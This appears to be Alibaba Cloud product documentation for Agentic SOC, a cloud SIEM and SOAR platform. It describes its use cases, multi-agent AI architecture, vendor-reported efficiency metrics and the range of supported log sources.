Agentic SOC is a cloud-native Security Information and Event Management (SIEM) and Security Orchestration, Automation, and Response (SOAR) platform. It centralizes log collection and threat analysis across multicloud and multi-account environments, applies built-in detection rules and AI models to identify threats automatically, and orchestrates automated response through playbooks — eliminating the data silos, slow threat discovery, and manual response bottlenecks common in traditional security operations.
Use cases
Unified multicloud log management
Challenge: Security logs scattered across multicloud and hybrid cloud environments arrive in inconsistent formats, creating data silos. Without a unified view, tracing cross-cloud attacks and running centralized audits requires significant manual effort.
How Agentic SOC helps:
Unified log ingestion: Ingests heterogeneous logs from multicloud, third-party, and on-premises environments into a single data lake. Supports connectors for services such as Amazon S3 and Apache Kafka.
Intelligent parsing and normalization: Uses a flexible parsing engine with field mapping to transform unstructured raw logs into a unified, standardized data model in real time.
Global analysis and tracing: Runs unified threat detection, cross-cloud attack tracing, and compliance auditing on top of the normalized data.
Web intrusion investigation
Challenge: After a web application is compromised, attackers typically chain multiple vulnerabilities together. Manually correlating logs from WAF, host security, and network traffic to reconstruct the attack sequence is time-consuming and error-prone.
How Agentic SOC helps:
Automated detection and correlation: Agentic SOC collects and analyzes Web Application Firewall (WAF) logs and host security logs. When it detects activities such as WebShell uploads and abnormal process executions, it automatically correlates individual alerts into a single, comprehensive Web Intrusion incident.
Attack path reconstruction: The incident detail page displays the complete attack timeline — from initial web access and vulnerability exploitation through WebShell writes, reverse shell execution, and malicious command execution.
Automated response: Run the Block Source IP via Cloud Firewall playbook to automatically instruct Cloud Firewall to block the attacker's source IP at the network edge.
Cryptomining malware remediation
Challenge: Cryptomining malware consumes significant compute resources, driving up cloud costs and degrading performance for legitimate workloads. The manual remediation process — locating the process, terminating the file, blocking mining pool connections, and patching the entry point — is slow and error-prone.
How Agentic SOC helps:
Precise detection: Agentic SOC combines host security logs, VPC flow logs, and built-in threat intelligence to identify cryptomining processes such as
xmrigand anomalous network connections to mining pools, generating a Cryptomining Activity incident.AI-assisted analysis: The AI Assistant analyzes the incident and recommends response actions based on historical cases and best practices — for example, "terminate the malicious process and block the mining pool IP."
Automated response: Select Use Recommended Response Policy to run a playbook that terminates the malicious process and quarantines the cryptomining file.
How it works
Agentic SOC follows a four-stage workflow from raw log collection to automated response:
Log collection and parsing: Collects raw logs from cloud products, third-party devices, and business applications.
Alert generation: Identifies potential threats from large log volumes using built-in detection rules, or ingests native alerts directly from third-party products.
Incident aggregation and handling: Correlates multiple alerts describing the same attack into a single incident using configurable correlation rules and graph computing models.
Response orchestration: Triggers playbooks automatically based on predefined conditions, or manually. Playbooks invoke component actions to generate response policies and dispatch response tasks for automated remediation.
Key concepts
| Concept | Definition | Learn more |
|---|---|---|
| Entity | A core object involved in an alert or incident — such as an IP address, domain name, file hash, process, host, container, cloud resource ID (for example, an ECS instance ID), or user account. Entities form the foundation for correlating alerts and reconstructing an attack path. | — |
| Incident | A high-fidelity security event created by correlating multiple related alerts from various data sources, using built-in rules and graph computing models. Agentic SOC aggregates alerts into a single incident and automatically reconstructs the attack timeline. | — |
| Response policy | Specifies the handling action for an entity in a given scenario. Each response action performed on an entity generates a unique policy. | — |
| Response task | An individual, executable job generated from a response policy and targeted at a specific scope. Each response policy for an entity is broken down into one or more response tasks based on the application scope. | — |
| Response orchestration | The process of organizing and managing security response actions through automated workflows (playbooks). Response orchestration automatically runs a series of operations based on predefined logic to handle incidents. | — |
| Playbook | A predefined, automated security workflow consisting of triggers, conditions, actions, and endpoints. Supports drag-and-drop graphical editing, letting you customize response logic for specific incident types such as cryptomining or ransomware. | — |
| Component | An interface that connects to and operates external systems or services. Components are the building blocks that execute specific actions within a playbook. | — |
| Resource instance | The specific service instance that an action targets — for example, a Cloud Firewall instance. | — |
| Action | A specific capability executed by a component. A single component may contain multiple actions. For example, an endpoint management component might include actions such as disable account, isolate network, and send notification. | — |
| Agent | An intelligent entity that perceives its environment, makes decisions, and takes actions autonomously. Agentic SOC uses a hierarchical multi-Agent collaborative architecture where a Team Leader coordinates specialized Agent teams responsible for threat detection, incident investigation, impact assessment, and user interaction. | Security Operations Agent details |
AI Agent architecture
The Agentic SOC Agent architecture deeply integrates Alibaba Cloud's cloud-native security data domain infrastructure. Built on large security language models, it delivers an end-to-end AI Agent security expert team that automatically senses threats, performs deep reasoning, runs collaborative investigations, and closes the loop quickly.
Three-layer architecture
| Layer | Components | Responsibilities |
|---|---|---|
| Cloud-Native Engine layer | Simple Log Service (SLS), Flink/timed SQL detection engine, Igraph graph computing, Large Language Model (LLM) Qwen, SOAR orchestration engine | Foundational data storage, computing, and AI capabilities |
| Agent Management Platform | Built on AgentRun | Manages Agent lifecycles, task scheduling, memory, and tool-calling orchestration |
| Agent Intelligence layer | Team Leader plus multiple specialized Agent teams | Autonomous reasoning and decision-making for security operations tasks |
Each Agent operates on the ReAct reasoning framework: perceive the environment → reason and analyze → plan actions → execute → observe results. This cycle repeats until the task is complete.
Team Leader and specialized Agent teams
The architecture uses a hierarchical multi-Agent collaborative model:
Team Leader: Built on the Qwen series of models, the Team Leader is the central dispatch node responsible for global scheduling, task decomposition, and complex decision-making.
Specialized Agent teams: Each team executes tasks independently in its domain and collaborates with the others.
| Team | Responsibilities | Core agents |
|---|---|---|
| Threat Detection | Performs deep analysis on large volumes of multi-source, heterogeneous data to identify known and unknown threats | Process Chain Analysis Agent, Network Behavior Analysis Agent, File Behavior Analysis Agent, Persistence Detection Agent |
| Incident Investigation | Autonomously completes incident investigations based on the ReAct framework to reconstruct attack paths and timelines | Attack Path Reconstruction Agent, IOC Extraction Agent, Action Validation Agent, Response Agent |
| Impact Assessment | Assesses the scope and risk level of security incidents | Lateral Movement Investigation Agent, Risk Time Window Inspection Agent, Risk Correlation Analysis Agent |
| User Interaction | Interacts with security operations personnel to provide consultation and analytical support | Investigation Deepening Trigger Agent, Inspection Task Setting Agent, Security Consultation (RAG) Agent |
Agent support varies by Agentic SOC edition. For details about version differences and billing, see Differences between Agentic SOC Basic Edition and Security Operations Agent.
Benefits
Agentic SOC integrates an AI Agent engine into the core of security operations, enabling a smart auto-pilot mode that scales from human-machine collaboration to fully automated response.
High-fidelity detection with a 99.94% alert reduction rate Combines global threat intelligence, graph computing, and cloud-native log analysis to accurately identify new, unknown, and highly evasive threats from large alert volumes. Average detection time for security incidents is reduced to minutes.
Automated response in seconds with 95% remediation coverage Provides one-click response policies and out-of-the-box automated playbooks that are customizable and ready to use without manual configuration. Coordinates with security products and infrastructure to deliver fully automated analysis and response. The Security Operations Agent — a premium intelligent service powered by the Agentic AI engine — deeply integrates with Alibaba Cloud's native security data and infrastructure. It uses autonomous perception, reasoning, and execution to independently analyze security incidents and accelerate response.
Full attack picture reconstruction with AI-assisted decision-making Uses graph computing and a security large language model to automatically trace and reconstruct the complete attack path and timeline. The built-in AI Assistant summarizes incidents and provides precise response recommendations.
Unified global view with a 90% cross-asset incident discovery rate Unifies collection and processing of log data from across clouds, accounts, and products, reducing the complexity of hybrid cloud security operations. Centralized management and auditing provide global security insights and simplify compliance efforts.
Security operations efficiency
Mean Time To Detect (MTTD), Mean Time To Acknowledge (MTTA), and Mean Time To Respond (MTTR) are standard metrics for measuring security operations efficiency. The following data is based on statistics from real users.
Efficiency overview
| Metric | Traditional methods | Agentic SOC | Efficiency gain |
|---|---|---|---|
| MTTD (Detection) | Hours | 5 minutes | From hours to minutes |
| MTTA (Acknowledgment) | Days | 35 minutes | From days to minutes |
| MTTR (Response) | Days / Weeks | 90 minutes | From weeks/days to 90 minutes |
Metric details
MTTD (Mean Time To Detect) The average time from when an attack occurs to when the system first detects it. Agentic SOC reduces threat detection from hours to 5 minutes, shrinking attacker dwell time and creating a critical window for rapid response.
MTTA (Mean Time To Acknowledge) The average time from when an incident is detected to when the security team confirms it as a true threat. Agentic SOC automatically investigates and traces threats after detection, reducing manual analysis from days to 35 minutes.
MTTR (Mean Time To Respond) The average time from when a threat is confirmed to when the system is fully remediated and restored. Agentic SOC uses automated, predefined playbooks to execute critical actions from confirmation to response in seconds, reducing overall response time from days to 90 minutes — freeing security teams from repetitive tasks to focus on deeper threat analysis.
Agent processing efficiency
| Metric | Description |
|---|---|
| Autonomous investigation and analysis rate: 81% | AI Agents independently complete Level 1 and Level 2 incident analysis — validated against full alert data with zero human intervention |
| Alert correlation and aggregate event convergence rate: 99.94% | Processes tens of thousands to millions of alerts weekly, converging them into hundreds of security events |
| Incident traceability report generation: 100x faster | Generates full attack chain reports in minutes — compared to hours for manual analysis |
| Log onboarding and standardization efficiency: 90% | Uses semantic recognition to automatically parse and map logs from heterogeneous data sources to a unified security model, and generates SPL with one click |
Supported products and logs
Agentic SOC natively supports logs from vendors including Alibaba Cloud, Huawei Cloud, Tencent Cloud, Fortinet, Chaitin, and Sangfor. It also supports data ingestion from custom products.
For details about default ingestion policies, data sources, and standardization rules, go to the Agentic SOC console.
| Vendor | Product | Log type |
|---|---|---|
| Alibaba Cloud | Security Center | Network defense alert logs, cloud platform configuration check logs, baseline logs, security alert logs, vulnerability logs, Runtime Application Self-Protection (RASP) alert logs, and cloud security posture management logs; account snapshot logs, network snapshot logs, and process snapshot logs; host logon failure logs, DNS request logs, logon trail logs, process startup logs, network connection logs, and brute-force attack logs |
| Web Application Firewall (WAF) | WAF full logs, blocked logs, blocked and observed logs, anti-crawler full logs, API security event alert logs, API risk logs, and WAF alert logs | |
| Cloud Firewall | Cloud Firewall alert logs, Cloud Firewall traffic logs, NDR HTTP logs, NDR DNS logs, and NDR event alert logs | |
| Anti-DDoS | Anti-DDoS Pro and Anti-DDoS Premium full logs | |
| Bastionhost | Bastionhost logs | |
| CDN | CDN flow logs | |
| Edge Security Acceleration (ESA) | DCDN user access logs and DCDN WAF blocked logs | |
| API Gateway | API Gateway logs | |
| Container Service for Kubernetes (ACK) | Kubernetes audit logs | |
| PolarDB | PolarDB-X 1.0 SQL audit logs and PolarDB-X 2.0 SQL audit logs | |
| ApsaraDB for MongoDB | MongoDB audit logs | |
| ApsaraDB RDS | RDS SQL audit logs | |
| Virtual Private Cloud (VPC) | VPC flow logs | |
| Elastic IP Address (EIP) | Elastic IP Address logs | |
| Server Load Balancer (SLB) | ALB access logs and CLB access logs | |
| Object Storage Service (OSS) | OSS access logs | |
| ActionTrail | ActionTrail event logs | |
| CloudConfig | Configuration audit logs | |
| File Storage NAS | NAS NFS operational logs | |
| AI Guardrails | Alibaba Cloud AI Security Guardrail logs | |
| Tencent Cloud | Web Application Firewall | Tencent Cloud Web Application Firewall alert logs |
| Cloud Firewall | Tencent Cloud Firewall alert logs | |
| Huawei Cloud | Web Application Firewall | Huawei Cloud Web Application Firewall alert logs |
| Cloud Firewall | Huawei Cloud Firewall alert logs | |
| Azure | Windows Defender for Endpoint | Endpoint alert logs |
| Azure Active Directory | Azure Active Directory audit logs and Azure Active Directory logon audit logs | |
| Activity | Audit logs | |
| SQL Database | SQL Server audit logs | |
| AWS | CloudTrail | CloudTrail logs |
| Redshift | Redshift audit logs | |
| GuardDuty | GuardDuty finding alert logs | |
| PostgreSQL on Amazon RDS | PostgreSQL event logs | |
| Volcengine | Security Center | HIDS alert logs |
| Fortinet | Fortinet Firewall | Fortinet Firewall alert logs, Fortinet Firewall flow logs, and Fortinet audit logs |
| Chaitin | Chaitin WAF | Chaitin WAF alert logs and Chaitin WAF flow logs |
| Microsoft | Endpoint event logs | Windows security event logs |
| Sangfor | Sangfor Endpoint Secure aES (EDR) | Endpoint detection and response alert logs |
| Hillstone Networks | Hillstone Networks Firewall | Hillstone Networks Firewall alert logs |
| Tophant | Tophant Full-Traffic Security Computing and Analysis Platform | Tophant Full-Traffic Security Computing and Analysis Platform product alert logs |
| SkyGuard | DLP | DLP alert logs |
| Threatbook | OneSEC | OneSEC alert logs |
| Cisco | Cisco Firepower Firewall | Firewall alert logs |
| Palo Alto | Next-Generation Firewall | Firewall alert logs |
| Cortex XDR | Palo Alto Cortex alert logs and endpoint alert logs | |
| Panorama | Panorama product logs | |
| Ege Cloud | Polaris | Layer 4 internal network access logs and data audit logs |
| Custom vendor | Custom product | Firewall alert logs, firewall traffic logs, Web Application Firewall (WAF) alert logs, and WAF traffic logs |
Version upgrade
Accounts that activate Agentic SOC on or after April 3, 2025 are provisioned on the latest architecture.
Agentic SOC 2.0 is built on log normalization capabilities and reuses Simple Log Service (SLS) capabilities to simplify data ingestion from third-party clouds and on-premises security products.
For a comparison of the main differences between versions, see Differences between Agentic SOC 2.0 and 1.0.
FAQ
How does Agentic SOC differ from a traditional SIEM?
Agentic SOC is built for cloud-native environments, with three core differences from traditional SIEMs:
Cloud-native integration: Integrates with Alibaba Cloud and other major cloud providers. It understands cloud assets, configurations, and topology to deliver context-aware threat analysis across your entire cloud environment.
Built-in SOAR: Includes an integrated SOAR engine. Agentic SOC not only detects threats but also uses playbooks to orchestrate automated remediation across cloud products and infrastructure, closing the loop from detection to response.
AI-driven analysis: Uses built-in graph computing and a security large language model to automatically aggregate alerts into security incidents and reconstruct attack timelines, improving the detection efficiency of advanced threats.
Out-of-the-box scenarios: Provides ready-to-use detection rules and response playbooks for common cloud attack scenarios such as cryptomining, ransomware, and web intrusion — no configuration required to get started.